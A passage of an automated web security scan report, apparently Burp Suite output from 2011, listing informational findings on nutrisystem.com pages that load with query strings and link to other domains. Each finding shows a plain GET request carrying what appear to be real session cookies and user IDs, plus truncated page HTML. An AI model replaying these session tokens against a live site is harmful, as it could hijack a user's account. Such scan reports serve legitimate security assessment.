<li><a href="http://nutrisystem.ca">Canada - English</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66836&amp;p=irol-IRHome" onclick="omni_track('InvestorRelations:footer');">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.nutrisystemnews.com/" target="_blank" onclick="omni_track('MediaInquires:footer');">Media Inquires</a>
...[SNIP]...
<li><a href="http://www.nutrisystemblog.com/" onclick="omni_track('NutrisystemBlog:footer');">Nutrisystem Blog</a>
...[SNIP]...

10.12. http://www.nutrisystem.com/jsps_hmr/catalog/men/vegetarian.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/vegetarian.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jsps_hmr/catalog/men/vegetarian.jsp?categoryId=1384 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
<li><a href="http://nutrisystem.ca">Canada - English</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66836&amp;p=irol-IRHome" onclick="omni_track('InvestorRelations:footer');">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.nutrisystemnews.com/" target="_blank" onclick="omni_track('MediaInquires:footer');">Media Inquires</a>
...[SNIP]...
<li><a href="http://www.nutrisystemblog.com/" onclick="omni_track('NutrisystemBlog:footer');">Nutrisystem Blog</a>
...[SNIP]...

10.13. http://www.nutrisystem.com/jsps_hmr/catalog/women/basic.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/basic.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jsps_hmr/catalog/women/basic.jsp?categoryId=353 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
<li><a href="http://nutrisystem.ca">Canada - English</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66836&amp;p=irol-IRHome" onclick="omni_track('InvestorRelations:footer');">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.nutrisystemnews.com/" target="_blank" onclick="omni_track('MediaInquires:footer');">Media Inquires</a>
...[SNIP]...
<li><a href="http://www.nutrisystemblog.com/" onclick="omni_track('NutrisystemBlog:footer');">Nutrisystem Blog</a>
...[SNIP]...

10.14. http://www.nutrisystem.com/jsps_hmr/catalog/women/diabetes.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/diabetes.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jsps_hmr/catalog/women/diabetes.jsp?categoryId=374 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Location: /jsps_hmr/product-pages/diabetic_overview.jsp
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Defect #671 - Need to inclu
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">Download the free Flash Player now!</a>
...[SNIP]...
<li><a href="http://nutrisystem.ca">Canada - English</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66836&amp;p=irol-IRHome" onclick="omni_track('InvestorRelations:footer');">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.nutrisystemnews.com/" target="_blank" onclick="omni_track('MediaInquires:footer');">Media Inquires</a>
...[SNIP]...
<li><a href="http://www.nutrisystemblog.com/" onclick="omni_track('NutrisystemBlog:footer');">Nutrisystem Blog</a>
...[SNIP]...

10.15. http://www.nutrisystem.com/jsps_hmr/catalog/women/silver.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/silver.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jsps_hmr/catalog/women/silver.jsp?categoryId=364 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Defect #671 - Need to include s
...[SNIP]...
<li><a href="http://nutrisystem.ca">Canada - English</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66836&amp;p=irol-IRHome" onclick="omni_track('InvestorRelations:footer');">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.nutrisystemnews.com/" target="_blank" onclick="omni_track('MediaInquires:footer');">Media Inquires</a>
...[SNIP]...
<li><a href="http://www.nutrisystemblog.com/" onclick="omni_track('NutrisystemBlog:footer');">Nutrisystem Blog</a>
...[SNIP]...

10.16. http://www.nutrisystem.com/jsps_hmr/catalog/women/vegetarian.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/vegetarian.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jsps_hmr/catalog/women/vegetarian.jsp?categoryId=384 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
<li><a href="http://nutrisystem.ca">Canada - English</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66836&amp;p=irol-IRHome" onclick="omni_track('InvestorRelations:footer');">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.nutrisystemnews.com/" target="_blank" onclick="omni_track('MediaInquires:footer');">Media Inquires</a>
...[SNIP]...
<li><a href="http://www.nutrisystemblog.com/" onclick="omni_track('NutrisystemBlog:footer');">Nutrisystem Blog</a>
...[SNIP]...

10.17. http://www.nutrisystem.com/jsps_hmr/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/home/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jsps_hmr/home/?_DARGS=/jsps_hmr/home/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta htt